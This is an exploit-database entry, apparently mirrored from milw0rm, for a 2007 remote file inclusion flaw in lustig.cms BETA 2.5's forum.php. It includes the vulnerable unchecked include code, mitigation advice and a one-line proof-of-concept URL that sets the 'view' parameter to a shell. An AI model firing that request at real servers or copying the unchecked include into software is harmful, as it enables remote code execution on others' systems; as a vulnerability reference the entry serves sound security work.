header-logo
Suggest Exploit
vendor:
lustig.cms
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: lustig.cms
Affected Version From: lustig.cms BETA 2.5
Affected Version To: lustig.cms BETA 2.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerabilities

This vulnerability allows an attacker to include remote files on the server by manipulating the 'view' parameter in the 'forum.php' file. By providing a malicious file path in the 'view' parameter, an attacker can execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, the developer should validate and sanitize user input before including files in the code. Additionally, the developer should avoid using user-controlled input for file inclusion.
Source

Exploit-DB raw data:

# lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerabilities

# D.Scripts : http://dfn.dl.sourceforge.net/sourceforge/lustig-cms/lustig.cms_beta_2.5_2.zip

# V.Code : Line 12 . 13 . 14

#  if(isset($view))
#  {
#  include $view;

# POC : /forum/forum.php?view=Shell 

# milw0rm.com [2007-09-27]

Navigation

Suggest Exploit

Services By CQR